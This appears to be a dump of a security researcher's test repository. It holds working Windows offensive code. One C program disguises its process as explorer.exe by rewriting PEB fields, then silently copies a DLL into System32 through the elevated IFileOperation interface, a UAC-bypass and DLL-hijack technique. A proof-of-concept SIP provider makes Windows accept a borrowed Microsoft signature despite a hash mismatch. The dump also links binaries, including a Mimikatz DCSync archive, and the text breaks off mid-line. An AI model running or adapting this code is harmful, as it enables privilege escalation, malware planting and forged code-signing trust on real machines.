#include 3 | 4 | #define RTL_MAX_DRIVE_LETTERS 32 5 | #define GDI_HANDLE_BUFFER_SIZE32 34 6 | #define GDI_HANDLE_BUFFER_SIZE64 60 7 | #define GDI_BATCH_BUFFER_SIZE 310 8 | 9 | #define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 ) 10 | #ifndef NT_SUCCESS 11 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0) 12 | #endif 13 | 14 | #if !defined(_M_X64) 15 | #define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE32 16 | #else 17 | #define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE64 18 | #endif 19 | 20 | typedef ULONG GDI_HANDLE_BUFFER32[GDI_HANDLE_BUFFER_SIZE32]; 21 | typedef ULONG GDI_HANDLE_BUFFER64[GDI_HANDLE_BUFFER_SIZE64]; 22 | typedef ULONG GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE]; 23 | 24 | typedef struct _UNICODE_STRING { 25 | USHORT Length; 26 | USHORT MaximumLength; 27 | PWSTR Buffer; 28 | } UNICODE_STRING; 29 | typedef UNICODE_STRING *PUNICODE_STRING; 30 | 31 | 32 | typedef struct _STRING { 33 | USHORT Length; 34 | USHORT MaximumLength; 35 | PCHAR Buffer; 36 | } STRING; 37 | typedef STRING *PSTRING; 38 | 39 | typedef struct _CLIENT_ID { 40 | HANDLE UniqueProcess; 41 | HANDLE UniqueThread; 42 | } CLIENT_ID, *PCLIENT_ID; 43 | 44 | typedef struct _CLIENT_ID64 { 45 | ULONG64 UniqueProcess; 46 | ULONG64 UniqueThread; 47 | } CLIENT_ID64, *PCLIENT_ID64; 48 | 49 | typedef struct _LDR_DATA_TABLE_ENTRY_COMPATIBLE { 50 | LIST_ENTRY InLoadOrderLinks; 51 | LIST_ENTRY InMemoryOrderLinks; 52 | union 53 | { 54 | LIST_ENTRY InInitializationOrderLinks; 55 | LIST_ENTRY InProgressLinks; 56 | } DUMMYUNION0; 57 | PVOID DllBase; 58 | PVOID EntryPoint; 59 | ULONG SizeOfImage; 60 | UNICODE_STRING FullDllName; 61 | UNICODE_STRING BaseDllName; 62 | union 63 | { 64 | ULONG Flags; 65 | struct 66 | { 67 | ULONG PackagedBinary : 1; // Size=4 Offset=104 BitOffset=0 BitCount=1 68 | ULONG MarkedForRemoval : 1; // Size=4 Offset=104 BitOffset=1 BitCount=1 69 | ULONG ImageDll : 1; // Size=4 Offset=104 BitOffset=2 BitCount=1 70 | ULONG LoadNotificationsSent : 1; // Size=4 Offset=104 BitOffset=3 BitCount=1 71 | ULONG TelemetryEntryProcessed : 1; // Size=4 Offset=104 BitOffset=4 BitCount=1 72 | ULONG ProcessStaticImport : 1; // Size=4 Offset=104 BitOffset=5 BitCount=1 73 | ULONG InLegacyLists : 1; // Size=4 Offset=104 BitOffset=6 BitCount=1 74 | ULONG InIndexes : 1; // Size=4 Offset=104 BitOffset=7 BitCount=1 75 | ULONG ShimDll : 1; // Size=4 Offset=104 BitOffset=8 BitCount=1 76 | ULONG InExceptionTable : 1; // Size=4 Offset=104 BitOffset=9 BitCount=1 77 | ULONG ReservedFlags1 : 2; // Size=4 Offset=104 BitOffset=10 BitCount=2 78 | ULONG LoadInProgress : 1; // Size=4 Offset=104 BitOffset=12 BitCount=1 79 | ULONG LoadConfigProcessed : 1; // Size=4 Offset=104 BitOffset=13 BitCount=1 80 | ULONG EntryProcessed : 1; // Size=4 Offset=104 BitOffset=14 BitCount=1 81 | ULONG ProtectDelayLoad : 1; // Size=4 Offset=104 BitOffset=15 BitCount=1 82 | ULONG ReservedFlags3 : 2; // Size=4 Offset=104 BitOffset=16 BitCount=2 83 | ULONG DontCallForThreads : 1; // Size=4 Offset=104 BitOffset=18 BitCount=1 84 | ULONG ProcessAttachCalled : 1; // Size=4 Offset=104 BitOffset=19 BitCount=1 85 | ULONG ProcessAttachFailed : 1; // Size=4 Offset=104 BitOffset=20 BitCount=1 86 | ULONG CorDeferredValidate : 1; // Size=4 Offset=104 BitOffset=21 BitCount=1 87 | ULONG CorImage : 1; // Size=4 Offset=104 BitOffset=22 BitCount=1 88 | ULONG DontRelocate : 1; // Size=4 Offset=104 BitOffset=23 BitCount=1 89 | ULONG CorILOnly : 1; // Size=4 Offset=104 BitOffset=24 BitCount=1 90 | ULONG ChpeImage : 1; // Size=4 Offset=104 BitOffset=25 BitCount=1 91 | ULONG ReservedFlags5 : 2; // Size=4 Offset=104 BitOffset=26 BitCount=2 92 | ULONG Redirected : 1; // Size=4 Offset=104 BitOffset=28 BitCount=1 93 | ULONG ReservedFlags6 : 2; // Size=4 Offset=104 BitOffset=29 BitCount=2 94 | ULONG CompatDatabaseProcessed : 1; // Size=4 Offset=104 BitOffset=31 BitCount=1 95 | }; 96 | } ENTRYFLAGSUNION; 97 | WORD ObsoleteLoadCount; 98 | WORD TlsIndex; 99 | union 100 | { 101 | LIST_ENTRY HashLinks; 102 | struct 103 | { 104 | PVOID SectionPointer; 105 | ULONG CheckSum; 106 | }; 107 | } DUMMYUNION1; 108 | union 109 | { 110 | ULONG TimeDateStamp; 111 | PVOID LoadedImports; 112 | } DUMMYUNION2; 113 | //fields below removed for compatibility 114 | } LDR_DATA_TABLE_ENTRY_COMPATIBLE, *PLDR_DATA_TABLE_ENTRY_COMPATIBLE; 115 | typedef LDR_DATA_TABLE_ENTRY_COMPATIBLE LDR_DATA_TABLE_ENTRY; 116 | 117 | typedef LDR_DATA_TABLE_ENTRY *PCLDR_DATA_TABLE_ENTRY; 118 | 119 | typedef struct _PEB_LDR_DATA { 120 | ULONG Length; 121 | BOOLEAN Initialized; 122 | HANDLE SsHandle; 123 | LIST_ENTRY InLoadOrderModuleList; 124 | LIST_ENTRY InMemoryOrderModuleList; 125 | LIST_ENTRY InInitializationOrderModuleList; 126 | PVOID EntryInProgress; 127 | BOOLEAN ShutdownInProgress; 128 | HANDLE ShutdownThreadId; 129 | } PEB_LDR_DATA, *PPEB_LDR_DATA; 130 | 131 | 132 | typedef struct _CURDIR { 133 | UNICODE_STRING DosPath; 134 | HANDLE Handle; 135 | } CURDIR, *PCURDIR; 136 | 137 | typedef struct _RTL_DRIVE_LETTER_CURDIR { 138 | USHORT Flags; 139 | USHORT Length; 140 | ULONG TimeStamp; 141 | STRING DosPath; 142 | } RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR; 143 | 144 | 145 | typedef struct _RTL_USER_PROCESS_PARAMETERS { 146 | ULONG MaximumLength; 147 | ULONG Length; 148 | 149 | ULONG Flags; 150 | ULONG DebugFlags; 151 | 152 | HANDLE ConsoleHandle; 153 | ULONG ConsoleFlags; 154 | HANDLE StandardInput; 155 | HANDLE StandardOutput; 156 | HANDLE StandardError; 157 | 158 | CURDIR CurrentDirectory; 159 | UNICODE_STRING DllPath; 160 | UNICODE_STRING ImagePathName; 161 | UNICODE_STRING CommandLine; 162 | PVOID Environment; 163 | 164 | ULONG StartingX; 165 | ULONG StartingY; 166 | ULONG CountX; 167 | ULONG CountY; 168 | ULONG CountCharsX; 169 | ULONG CountCharsY; 170 | ULONG FillAttribute; 171 | 172 | ULONG WindowFlags; 173 | ULONG ShowWindowFlags; 174 | UNICODE_STRING WindowTitle; 175 | UNICODE_STRING DesktopInfo; 176 | UNICODE_STRING ShellInfo; 177 | UNICODE_STRING RuntimeData; 178 | RTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS]; 179 | 180 | ULONG EnvironmentSize; 181 | ULONG EnvironmentVersion; 182 | PVOID PackageDependencyData; //8+ 183 | ULONG ProcessGroupId; 184 | // ULONG LoaderThreads; 185 | } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS; 186 | 187 | typedef struct _PEB { 188 | BOOLEAN InheritedAddressSpace; 189 | BOOLEAN ReadImageFileExecOptions; 190 | BOOLEAN BeingDebugged; 191 | union 192 | { 193 | BOOLEAN BitField; 194 | struct 195 | { 196 | BOOLEAN ImageUsesLargePages : 1; 197 | BOOLEAN IsProtectedProcess : 1; 198 | BOOLEAN IsImageDynamicallyRelocated : 1; 199 | BOOLEAN SkipPatchingUser32Forwarders : 1; 200 | BOOLEAN IsPackagedProcess : 1; 201 | BOOLEAN IsAppContainer : 1; 202 | BOOLEAN IsProtectedProcessLight : 1; 203 | BOOLEAN IsLongPathAwareProcess : 1; 204 | }; 205 | }; 206 | HANDLE Mutant; 207 | 208 | PVOID ImageBaseAddress; 209 | PPEB_LDR_DATA Ldr; 210 | PRTL_USER_PROCESS_PARAMETERS ProcessParameters; 211 | PVOID SubSystemData; 212 | PVOID ProcessHeap; 213 | PRTL_CRITICAL_SECTION FastPebLock; 214 | PVOID AtlThunkSListPtr; 215 | PVOID IFEOKey; 216 | union 217 | { 218 | ULONG CrossProcessFlags; 219 | struct 220 | { 221 | ULONG ProcessInJob : 1; 222 | ULONG ProcessInitializing : 1; 223 | ULONG ProcessUsingVEH : 1; 224 | ULONG ProcessUsingVCH : 1; 225 | ULONG ProcessUsingFTH : 1; 226 | ULONG ProcessPreviouslyThrottled : 1; 227 | ULONG ProcessCurrentlyThrottled : 1; 228 | ULONG ReservedBits0 : 25; 229 | }; 230 | ULONG EnvironmentUpdateCount; 231 | }; 232 | union 233 | { 234 | PVOID KernelCallbackTable; 235 | PVOID UserSharedInfoPtr; 236 | }; 237 | ULONG SystemReserved[1]; 238 | ULONG AtlThunkSListPtr32; 239 | PVOID ApiSetMap; 240 | ULONG TlsExpansionCounter; 241 | PVOID TlsBitmap; 242 | ULONG TlsBitmapBits[2]; 243 | PVOID ReadOnlySharedMemoryBase; 244 | PVOID HotpatchInformation; 245 | PVOID *ReadOnlyStaticServerData; 246 | PVOID AnsiCodePageData; 247 | PVOID OemCodePageData; 248 | PVOID UnicodeCaseTableData; 249 | 250 | ULONG NumberOfProcessors; 251 | ULONG NtGlobalFlag; 252 | 253 | LARGE_INTEGER CriticalSectionTimeout; 254 | SIZE_T HeapSegmentReserve; 255 | SIZE_T HeapSegmentCommit; 256 | SIZE_T HeapDeCommitTotalFreeThreshold; 257 | SIZE_T HeapDeCommitFreeBlockThreshold; 258 | 259 | ULONG NumberOfHeaps; 260 | ULONG MaximumNumberOfHeaps; 261 | PVOID *ProcessHeaps; 262 | 263 | PVOID GdiSharedHandleTable; 264 | PVOID ProcessStarterHelper; 265 | ULONG GdiDCAttributeList; 266 | 267 | PRTL_CRITICAL_SECTION LoaderLock; 268 | 269 | ULONG OSMajorVersion; 270 | ULONG OSMinorVersion; 271 | USHORT OSBuildNumber; 272 | USHORT OSCSDVersion; 273 | ULONG OSPlatformId; 274 | ULONG ImageSubsystem; 275 | ULONG ImageSubsystemMajorVersion; 276 | ULONG ImageSubsystemMinorVersion; 277 | ULONG_PTR ImageProcessAffinityMask; 278 | GDI_HANDLE_BUFFER GdiHandleBuffer; 279 | PVOID PostProcessInitRoutine; 280 | 281 | PVOID TlsExpansionBitmap; 282 | ULONG TlsExpansionBitmapBits[32]; 283 | 284 | ULONG SessionId; 285 | 286 | ULARGE_INTEGER AppCompatFlags; 287 | ULARGE_INTEGER AppCompatFlagsUser; 288 | PVOID pShimData; 289 | PVOID AppCompatInfo; 290 | 291 | UNICODE_STRING CSDVersion; 292 | 293 | PVOID ActivationContextData; 294 | PVOID ProcessAssemblyStorageMap; 295 | PVOID SystemDefaultActivationContextData; 296 | PVOID SystemAssemblyStorageMap; 297 | 298 | SIZE_T MinimumStackCommit; 299 | 300 | PVOID *FlsCallback; 301 | LIST_ENTRY FlsListHead; 302 | PVOID FlsBitmap; 303 | ULONG FlsBitmapBits[FLS_MAXIMUM_AVAILABLE / (sizeof(ULONG) * 8)]; 304 | ULONG FlsHighIndex; 305 | 306 | PVOID WerRegistrationData; 307 | PVOID WerShipAssertPtr; 308 | PVOID pContextData; 309 | PVOID pImageHeaderHash; 310 | union 311 | { 312 | ULONG TracingFlags; 313 | struct 314 | { 315 | ULONG HeapTracingEnabled : 1; 316 | ULONG CritSecTracingEnabled : 1; 317 | ULONG LibLoaderTracingEnabled : 1; 318 | ULONG SpareTracingBits : 29; 319 | }; 320 | }; 321 | ULONGLONG CsrServerReadOnlySharedMemoryBase; 322 | } PEB, *PPEB; 323 | 324 | typedef struct _GDI_TEB_BATCH { 325 | ULONG Offset; 326 | UCHAR Alignment[4]; 327 | ULONG_PTR HDC; 328 | ULONG Buffer[GDI_BATCH_BUFFER_SIZE]; 329 | } GDI_TEB_BATCH, *PGDI_TEB_BATCH; 330 | 331 | typedef struct _TEB_ACTIVE_FRAME_CONTEXT { 332 | ULONG Flags; 333 | PSTR FrameName; 334 | } TEB_ACTIVE_FRAME_CONTEXT, *PTEB_ACTIVE_FRAME_CONTEXT; 335 | 336 | typedef struct _TEB_ACTIVE_FRAME { 337 | ULONG Flags; 338 | struct _TEB_ACTIVE_FRAME *Previous; 339 | PTEB_ACTIVE_FRAME_CONTEXT Context; 340 | } TEB_ACTIVE_FRAME, *PTEB_ACTIVE_FRAME; 341 | 342 | typedef struct _TEB { 343 | NT_TIB NtTib; 344 | 345 | PVOID EnvironmentPointer; 346 | CLIENT_ID ClientId; 347 | PVOID ActiveRpcHandle; 348 | PVOID ThreadLocalStoragePointer; 349 | PPEB ProcessEnvironmentBlock; 350 | 351 | ULONG LastErrorValue; 352 | ULONG CountOfOwnedCriticalSections; 353 | PVOID CsrClientThread; 354 | PVOID Win32ThreadInfo; 355 | ULONG User32Reserved[26]; 356 | ULONG UserReserved[5]; 357 | PVOID WOW32Reserved; 358 | LCID CurrentLocale; 359 | ULONG FpSoftwareStatusRegister; 360 | PVOID SystemReserved1[54]; 361 | NTSTATUS ExceptionCode; 362 | PVOID ActivationContextStackPointer; 363 | #if defined(_M_X64) 364 | UCHAR SpareBytes[24]; 365 | #else 366 | UCHAR SpareBytes[36]; 367 | #endif 368 | ULONG TxFsContext; 369 | 370 | GDI_TEB_BATCH GdiTebBatch; 371 | CLIENT_ID RealClientId; 372 | HANDLE GdiCachedProcessHandle; 373 | ULONG GdiClientPID; 374 | ULONG GdiClientTID; 375 | PVOID GdiThreadLocalInfo; 376 | ULONG_PTR Win32ClientInfo[62]; 377 | PVOID glDispatchTable[233]; 378 | ULONG_PTR glReserved1[29]; 379 | PVOID glReserved2; 380 | PVOID glSectionInfo; 381 | PVOID glSection; 382 | PVOID glTable; 383 | PVOID glCurrentRC; 384 | PVOID glContext; 385 | 386 | NTSTATUS LastStatusValue; 387 | UNICODE_STRING StaticUnicodeString; 388 | WCHAR StaticUnicodeBuffer[261]; 389 | 390 | PVOID DeallocationStack; 391 | PVOID TlsSlots[64]; 392 | LIST_ENTRY TlsLinks; 393 | 394 | PVOID Vdm; 395 | PVOID ReservedForNtRpc; 396 | PVOID DbgSsReserved[2]; 397 | 398 | ULONG HardErrorMode; 399 | #if defined(_M_X64) 400 | PVOID Instrumentation[11]; 401 | #else 402 | PVOID Instrumentation[9]; 403 | #endif 404 | GUID ActivityId; 405 | 406 | PVOID SubProcessTag; 407 | PVOID EtwLocalData; 408 | PVOID EtwTraceData; 409 | PVOID WinSockData; 410 | ULONG GdiBatchCount; 411 | 412 | union 413 | { 414 | PROCESSOR_NUMBER CurrentIdealProcessor; 415 | ULONG IdealProcessorValue; 416 | struct 417 | { 418 | UCHAR ReservedPad0; 419 | UCHAR ReservedPad1; 420 | UCHAR ReservedPad2; 421 | UCHAR IdealProcessor; 422 | }; 423 | }; 424 | 425 | ULONG GuaranteedStackBytes; 426 | PVOID ReservedForPerf; 427 | PVOID ReservedForOle; 428 | ULONG WaitingOnLoaderLock; 429 | PVOID SavedPriorityState; 430 | ULONG_PTR SoftPatchPtr1; 431 | PVOID ThreadPoolData; 432 | PVOID *TlsExpansionSlots; 433 | #if defined(_M_X64) 434 | PVOID DeallocationBStore; 435 | PVOID BStoreLimit; 436 | #endif 437 | ULONG MuiGeneration; 438 | ULONG IsImpersonating; 439 | PVOID NlsCache; 440 | PVOID pShimData; 441 | ULONG HeapVirtualAffinity; 442 | HANDLE CurrentTransactionHandle; 443 | PTEB_ACTIVE_FRAME ActiveFrame; 444 | PVOID FlsData; 445 | 446 | PVOID PreferredLanguages; 447 | PVOID UserPrefLanguages; 448 | PVOID MergedPrefLanguages; 449 | ULONG MuiImpersonation; 450 | 451 | union 452 | { 453 | USHORT CrossTebFlags; 454 | USHORT SpareCrossTebBits : 16; 455 | }; 456 | union 457 | { 458 | USHORT SameTebFlags; 459 | struct 460 | { 461 | USHORT SafeThunkCall : 1; 462 | USHORT InDebugPrint : 1; 463 | USHORT HasFiberData : 1; 464 | USHORT SkipThreadAttach : 1; 465 | USHORT WerInShipAssertCode : 1; 466 | USHORT RanProcessInit : 1; 467 | USHORT ClonedThread : 1; 468 | USHORT SuppressDebugMsg : 1; 469 | USHORT DisableUserStackWalk : 1; 470 | USHORT RtlExceptionAttached : 1; 471 | USHORT InitialThread : 1; 472 | USHORT SpareSameTebBits : 1; 473 | }; 474 | }; 475 | 476 | PVOID TxnScopeEnterCallback; 477 | PVOID TxnScopeExitCallback; 478 | PVOID TxnScopeContext; 479 | ULONG LockCount; 480 | ULONG SpareUlong0; 481 | PVOID ResourceRetValue; 482 | } TEB, *PTEB; 483 | 484 | typedef VOID(NTAPI *PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION)( 485 | _In_ PCLDR_DATA_TABLE_ENTRY DataTableEntry, 486 | _In_ PVOID Context, 487 | _Inout_ BOOLEAN *StopEnumeration 488 | ); 489 | 490 | typedef PVOID NTAPI RTLINITUNICODESTRING( 491 | _Inout_ PUNICODE_STRING DestinationString, 492 | _In_opt_ PCWSTR SourceString 493 | ); 494 | typedef RTLINITUNICODESTRING FAR * LPRTLINITUNICODESTRING; 495 | LPRTLINITUNICODESTRING RtlInitUnicodeString; 496 | 497 | typedef NTSTATUS NTAPI RTLENTERCRITICALSECTION( 498 | _In_ PRTL_CRITICAL_SECTION CriticalSection 499 | ); 500 | typedef RTLENTERCRITICALSECTION FAR * LPRTLENTERCRITICALSECTION; 501 | LPRTLENTERCRITICALSECTION RtlEnterCriticalSection; 502 | 503 | typedef NTSTATUS NTAPI RTLLEAVECRITICALSECTION( 504 | _In_ PRTL_CRITICAL_SECTION CriticalSection 505 | ); 506 | typedef RTLLEAVECRITICALSECTION FAR * LPRTLLEAVECRITICALSECTION; 507 | LPRTLLEAVECRITICALSECTION RtlLeaveCriticalSection; 508 | 509 | typedef NTSTATUS NTAPI LDRENUMERATELOADEDMODULES( 510 | _In_opt_ ULONG Flags, 511 | _In_ PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION CallbackFunction, 512 | _In_opt_ PVOID Context); 513 | typedef LDRENUMERATELOADEDMODULES FAR * LPLDRENUMERATELOADEDMODULES; 514 | LPLDRENUMERATELOADEDMODULES LdrEnumerateLoadedModules; 515 | 516 | typedef NTSTATUS NTAPI NTALLOCATEVIRTUALMEMORY( 517 | _In_ HANDLE ProcessHandle, 518 | _Inout_ PVOID *BaseAddress, 519 | _In_ ULONG_PTR ZeroBits, 520 | _Inout_ PSIZE_T RegionSize, 521 | _In_ ULONG AllocationType, 522 | _In_ ULONG Protect 523 | ); 524 | typedef NTALLOCATEVIRTUALMEMORY FAR * LPNTALLOCATEVIRTUALMEMORY; 525 | LPNTALLOCATEVIRTUALMEMORY NtAllocateVirtualMemory; 526 | 527 | LPWSTR g_lpszExplorer2 = TEXT("C:\\windows\\explorer.exe"); 528 | 529 | VOID NTAPI supxLdrEnumModulesCallback( 530 | _In_ PCLDR_DATA_TABLE_ENTRY DataTableEntry, 531 | _In_ PVOID Context, 532 | _Inout_ BOOLEAN *StopEnumeration 533 | ) 534 | { 535 | PPEB Peb = (PPEB)Context; 536 | 537 | if (DataTableEntry->DllBase == Peb->ImageBaseAddress) { 538 | RtlInitUnicodeString(&DataTableEntry->FullDllName, g_lpszExplorer2); 539 | RtlInitUnicodeString(&DataTableEntry->BaseDllName, L"explorer.exe"); 540 | *StopEnumeration = TRUE; 541 | } 542 | else { 543 | *StopEnumeration = FALSE; 544 | } 545 | } 546 | 547 | __inline struct _PEB * NtCurrentPeb() { return NtCurrentTeb()->ProcessEnvironmentBlock; } 548 | 549 | VOID supMasqueradeProcess( 550 | VOID 551 | ) 552 | { 553 | NTSTATUS Status; 554 | PPEB Peb = NtCurrentPeb(); 555 | SIZE_T RegionSize; 556 | 557 | PVOID g_lpszExplorer = NULL; 558 | RegionSize = 0x1000; 559 | 560 | Status = NtAllocateVirtualMemory( 561 | NtCurrentProcess(), 562 | &g_lpszExplorer, 563 | 0, 564 | &RegionSize, 565 | MEM_COMMIT | MEM_RESERVE, 566 | PAGE_READWRITE); 567 | 568 | if (NT_SUCCESS(Status)) { 569 | RtlEnterCriticalSection(Peb->FastPebLock); 570 | 571 | RtlInitUnicodeString(&Peb->ProcessParameters->ImagePathName, g_lpszExplorer2); 572 | RtlInitUnicodeString(&Peb->ProcessParameters->CommandLine, g_lpszExplorer2); 573 | 574 | RtlLeaveCriticalSection(Peb->FastPebLock); 575 | 576 | LdrEnumerateLoadedModules(0, &supxLdrEnumModulesCallback, (PVOID)Peb); 577 | } 578 | } 579 | 580 | int _tmain(int argc, _TCHAR* argv[]) 581 | { 582 | HINSTANCE hinstStub = GetModuleHandle(_T("ntdll.dll")); 583 | if(hinstStub) 584 | { 585 | RtlInitUnicodeString = (LPRTLINITUNICODESTRING)GetProcAddress(hinstStub, "RtlInitUnicodeString"); 586 | if (!RtlInitUnicodeString) 587 | { 588 | printf("Could not find RtlInitUnicodeString entry point in NTDLL.DLL"); 589 | exit(0); 590 | } 591 | 592 | RtlEnterCriticalSection = (LPRTLENTERCRITICALSECTION)GetProcAddress(hinstStub, "RtlEnterCriticalSection"); 593 | if (!RtlEnterCriticalSection) 594 | { 595 | printf("Could not find RtlEnterCriticalSection entry point in NTDLL.DLL"); 596 | exit(0); 597 | } 598 | 599 | RtlLeaveCriticalSection = (LPRTLLEAVECRITICALSECTION)GetProcAddress(hinstStub, "RtlLeaveCriticalSection"); 600 | if (!RtlLeaveCriticalSection) 601 | { 602 | printf("Could not find RtlLeaveCriticalSection entry point in NTDLL.DLL"); 603 | exit(0); 604 | } 605 | 606 | LdrEnumerateLoadedModules = (LPLDRENUMERATELOADEDMODULES)GetProcAddress(hinstStub, "LdrEnumerateLoadedModules"); 607 | if (!LdrEnumerateLoadedModules) 608 | { 609 | printf("Could not find LdrEnumerateLoadedModules entry point in NTDLL.DLL"); 610 | exit(0); 611 | } 612 | 613 | NtAllocateVirtualMemory = (LPNTALLOCATEVIRTUALMEMORY)GetProcAddress(hinstStub, "NtAllocateVirtualMemory"); 614 | if (!NtAllocateVirtualMemory) 615 | { 616 | printf("Could not find NtAllocateVirtualMemory entry point in NTDLL.DLL"); 617 | exit(0); 618 | } 619 | } 620 | else 621 | { 622 | printf("Could not GetModuleHandle of NTDLL.DLL"); 623 | exit(0); 624 | } 625 | 626 | supMasqueradeProcess(); 627 | 628 | HMODULE hModule = NULL; 629 | IFileOperation *fileOperation = NULL; 630 | LPCWSTR dllName = L"ntwdblib.dll"; 631 | LPCWSTR SourceFullPath = L"C:\\6\\ntwdblib.dll"; 632 | LPCWSTR DestPath = L"C:\\windows\\System32"; 633 | HRESULT hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE); 634 | if (SUCCEEDED(hr)) { 635 | hr = CoCreateInstance(CLSID_FileOperation, NULL, CLSCTX_ALL, IID_PPV_ARGS(&fileOperation)); 636 | if (SUCCEEDED(hr)) { 637 | hr = fileOperation->SetOperationFlags( 638 | FOF_NOCONFIRMATION | 639 | FOF_SILENT | 640 | FOFX_SHOWELEVATIONPROMPT | 641 | FOFX_NOCOPYHOOKS | 642 | FOFX_REQUIREELEVATION | 643 | FOF_NOERRORUI); 644 | if (SUCCEEDED(hr)) { 645 | IShellItem *from = NULL, *to = NULL; 646 | hr = SHCreateItemFromParsingName(SourceFullPath, NULL, IID_PPV_ARGS(&from)); 647 | if (SUCCEEDED(hr)) { 648 | if (DestPath) 649 | hr = SHCreateItemFromParsingName(DestPath, NULL, IID_PPV_ARGS(&to)); 650 | if (SUCCEEDED(hr)) { 651 | hr = fileOperation->CopyItem(from, to, dllName, NULL); 652 | if (NULL != to) 653 | to->Release(); 654 | } 655 | from->Release(); 656 | } 657 | if (SUCCEEDED(hr)) { 658 | hr = fileOperation->PerformOperations(); 659 | } 660 | } 661 | fileOperation->Release(); 662 | } 663 | CoUninitialize(); 664 | } 665 | 666 | // MessageBoxA(0, "Hello World", "Hello World", 0); 667 | return 0; 668 | } 669 | 670 | -------------------------------------------------------------------------------- /MicTray.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/MicTray.exe -------------------------------------------------------------------------------- /MicTray64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/MicTray64.exe -------------------------------------------------------------------------------- /Microsoft.ActiveDirectory.Management.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/Microsoft.ActiveDirectory.Management.dll -------------------------------------------------------------------------------- /Microsoft.Exchange.Data(dll of Exchange2010).zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/Microsoft.Exchange.Data(dll of Exchange2010).zip -------------------------------------------------------------------------------- /Mimkatz-dcsync.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/Mimkatz-dcsync.zip -------------------------------------------------------------------------------- /MySIP.c: -------------------------------------------------------------------------------- 1 | #include "MySIP.h" 2 | 3 | HMODULE DllModuleAddress; 4 | GUID MySIPGUID = CRYPT_SUBJTYPE_MY_IMAGE; 5 | 6 | BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) 7 | { 8 | UNREFERENCED_PARAMETER(fdwReason); 9 | UNREFERENCED_PARAMETER(lpvReserved); 10 | 11 | DllModuleAddress = (HMODULE) hinstDLL; 12 | 13 | return TRUE; 14 | } 15 | 16 | STDAPI DllRegisterServer(void) 17 | { 18 | HRESULT result; 19 | SIP_ADD_NEWPROVIDER NewProvider; 20 | WCHAR Filename[MAX_PATH]; 21 | 22 | result = S_OK; 23 | 24 | memset(&NewProvider, 0, sizeof(SIP_ADD_NEWPROVIDER)); 25 | 26 | if (!GetModuleFileName(DllModuleAddress, Filename, MAX_PATH)) { 27 | goto exit; 28 | } 29 | 30 | NewProvider.cbStruct = sizeof(SIP_ADD_NEWPROVIDER); 31 | NewProvider.pgSubject = &MySIPGUID, 32 | NewProvider.pwszDLLFileName = Filename, 33 | NewProvider.pwszMagicNumber = NULL; 34 | NewProvider.pwszIsFunctionName = NULL; 35 | NewProvider.pwszIsFunctionNameFmt2 = L"IsMyFileExtension"; 36 | NewProvider.pwszGetFuncName = L"GetLegitMSSignature"; 37 | NewProvider.pwszPutFuncName = L"MyPutSignature"; 38 | NewProvider.pwszCreateFuncName = L"MyCreateHash"; 39 | NewProvider.pwszVerifyFuncName = L"AutoApproveHash"; 40 | NewProvider.pwszRemoveFuncName = L"MyDelSignature"; 41 | 42 | if (!CryptSIPAddProvider(&NewProvider)) { goto exit; } 43 | 44 | goto success; 45 | 46 | exit: 47 | 48 | result = GetLastError(); 49 | 50 | if (result > 0) { result = HRESULT_FROM_WIN32(result); } 51 | 52 | success: 53 | 54 | return result; 55 | } 56 | 57 | STDAPI DllUnregisterServer(void) { 58 | CryptSIPRemoveProvider(&MySIPGUID); 59 | 60 | return S_OK; 61 | } 62 | 63 | // Considering this PoC SIP is only designed to retrieve a legitimate certificate 64 | // and validate is despite a hash mismatch, this function is not implemented. 65 | BOOL WINAPI MyPutSignature(SIP_SUBJECTINFO *pSubjectInfo, DWORD dwEncodingType, DWORD *pdwIndex, DWORD cbSignedDataMsg, BYTE *pbSignedDataMsg) { 66 | UNREFERENCED_PARAMETER(pSubjectInfo); 67 | UNREFERENCED_PARAMETER(dwEncodingType); 68 | UNREFERENCED_PARAMETER(pdwIndex); 69 | UNREFERENCED_PARAMETER(cbSignedDataMsg); 70 | UNREFERENCED_PARAMETER(pbSignedDataMsg); 71 | 72 | return TRUE; 73 | } 74 | 75 | // Considering this PoC SIP is only designed to retrieve a legitimate certificate 76 | // and validate is despite a hash mismatch, this function is not implemented. 77 | BOOL WINAPI MyCreateHash(SIP_SUBJECTINFO *pSubjectInfo, DWORD *pcbIndirectData, SIP_INDIRECT_DATA *pIndirectData) { 78 | UNREFERENCED_PARAMETER(pSubjectInfo); 79 | UNREFERENCED_PARAMETER(pcbIndirectData); 80 | UNREFERENCED_PARAMETER(pIndirectData); 81 | 82 | return TRUE; 83 | } 84 | 85 | // Considering this PoC SIP is only designed to retrieve a legitimate certificate 86 | // and validate is despite a hash mismatch, this function is not implemented. 87 | BOOL WINAPI MyDelSignature(SIP_SUBJECTINFO *pSubjectInfo, DWORD dwIndex) { 88 | UNREFERENCED_PARAMETER(pSubjectInfo); 89 | UNREFERENCED_PARAMETER(dwIndex); 90 | 91 | return TRUE; 92 | } 93 | 94 | BOOL WINAPI IsMyFileExtension(WCHAR *pwszFileName, GUID *pgSubject) { 95 | BOOL bResult; 96 | INT i; 97 | WCHAR *SupportedExtensions[SUPPORTED_EXTENSION_COUNT]; 98 | WCHAR *Extension; 99 | 100 | SupportedExtensions[0] 